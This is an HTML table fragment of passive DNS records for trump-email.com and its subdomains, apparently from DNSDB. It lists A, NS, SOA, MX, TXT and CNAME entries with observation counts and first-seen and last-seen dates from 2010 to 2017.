<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><span style="color: #20124d;">184.168.221.46</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">84316</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2010-07-02 19:20:21 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 01:43:28 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns1.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns1.cdcservices.com.</span></a></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><span style="color: #20124d;">ns2.cdcservices.com.</span></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns3.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns3.cdcservices.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">292</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 02:52:17 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 14:31:14 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns33.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns33.domaincontrol.com.</span></a></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns34.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns34.domaincontrol.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">6251</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2010-07-23 05:00:14 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:36:45 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns1.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns1.cdcservices.com.</span></a></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns2.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns2.cdcservices.com.</span></a></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns3.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">ns3.cdcservices.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">166</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 02:52:17 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-18 02:23:26 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns33.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns33.domaincontrol.com.</span></a></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_NS_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">NS</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_ns34.domaincontrol.com." style="text-decoration: none;"><span style="color: #20124d;">ns34.domaincontrol.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">113</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 04:25:30 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:40:00 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_SOA_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">SOA</span></a></tt></td><td><tt><span style="color: #20124d;">ns33.domaincontrol.com. dns.jomax.net. 2017030700 28800 7200 604800 600</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><span style="color: #20124d;">trump-email.com.</span></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">10</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2014-11-02 07:51:23 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2014-11-18 11:50:25 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_SOA_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">SOA</span></a></tt></td><td><tt><span style="color: #20124d;">ns1.cdcservices.com. postmaster.centralservices.local. 2012062509 1200 120 1209600 3600</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2106</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2014-12-04 23:24:31 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 13:47:43 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_SOA_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">SOA</span></a></tt></td><td><tt><span style="color: #20124d;">ns1.cdcservices.com. postmaster.centralservices.local. 2012062510 1200 120 1209600 3600</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">1</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2011-09-13 21:38:59 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2011-09-13 21:38:59 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">10 mx20.cdcservices.com.</span></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">20 mx21.cdcservices.com.</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">18</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-11 03:22:33 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:40:00 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">0 smtp.secureserver.net.</span></tt></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">10 mailstore1.secureserver.net.</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">12</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2011-12-14 22:04:06 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:36:45 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_MX_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">MX</span></a></tt></td><td><tt><span style="color: #20124d;">10 <a href="https://www.dnsdb.info/#Search_rdata_name_ANY_incoming.cdcservices.com." style="text-decoration: none;">incoming.cdcservices.com.</a></span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">10</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2014-11-14 11:17:46 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 12:59:33 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_TXT_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">TXT</span></a></tt></td><td><tt><span style="color: #20124d;">"Internet Solution from Cendyn.com."</span></tt></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_TXT_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">TXT</span></a></tt></td><td><tt><span style="color: #20124d;">"v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"</span></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">17</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2011-05-07 03:06:37 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 05:43:42 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_www.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">www.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_www.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 15:46:36 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 15:46:36 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_mail.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">4</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2011-05-07 03:06:37 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 12:10:41 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_mail.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_mx3.cdcservices.com." style="text-decoration: none;"><span style="color: #20124d;">mx3.cdcservices.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">119</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2012-12-19 15:37:59 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2013-07-12 18:14:52 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY__client._smtp.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">_client._smtp.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME__client._smtp.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">8</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 23:40:31 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-16 22:30:04 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_links.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">links.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_links.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">163659</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2010-07-05 07:37:16 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-22 19:45:03 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_links.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">links.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_CNAME_links.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">CNAME</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_ANY_customers.listrak.com." style="text-decoration: none;"><span style="color: #20124d;">customers.listrak.com.</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">20608</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2010-07-02 19:20:22 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-13 01:47:56 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail1.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail1.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_mail1.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_66.216.133.29" style="text-decoration: none;"><span style="color: #20124d;">66.216.133.29</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">57</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-08 04:32:26 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 00:15:59 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail1.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail1.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_mail1.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 15:46:41 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-10 15:46:41 -0000</span></td></tr>
<tr id="color0" style="background-color: #aecbe6;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_mail2.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">mail2.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_mail2.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">1</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:40:00 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2017-03-17 21:40:00 -0000</span></td></tr>
<tr id="color1" style="background-color: gainsboro;"><td><tt><a href="https://www.dnsdb.info/#Search_rdata_name_ANY_ctudgrekow.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">ctudgrekow.trump-email.com.</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rrset_A_ctudgrekow.trump-email.com." style="text-decoration: none;"><span style="color: #20124d;">A</span></a></tt></td><td><tt><a href="https://www.dnsdb.info/#Search_rdata_ip_ANY_184.168.221.46" style="text-decoration: none;"><span style="color: #20124d;">184.168.221.46</span></a></tt></td></tr>
<tr><td></td></tr>
<tr><td><span style="color: #20124d;">bailiwick</span></td><td colspan="2"><b><a href="https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com." id="bwick" style="text-decoration: none;"><span style="color: #20124d;">trump-email.com.</span></a></b></td></tr>
<tr><td><span style="color: #20124d;">count</span></td><td colspan="2"><span style="color: #20124d;">2</span></td></tr>
<tr><td><span style="color: #20124d;">first seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:36:46 -0000</span></td></tr>
<tr><td><span style="color: #20124d;">last seen</span></td><td colspan="2"><span style="color: #20124d;">2016-09-23 08:36:46 -0000</span></td></tr>
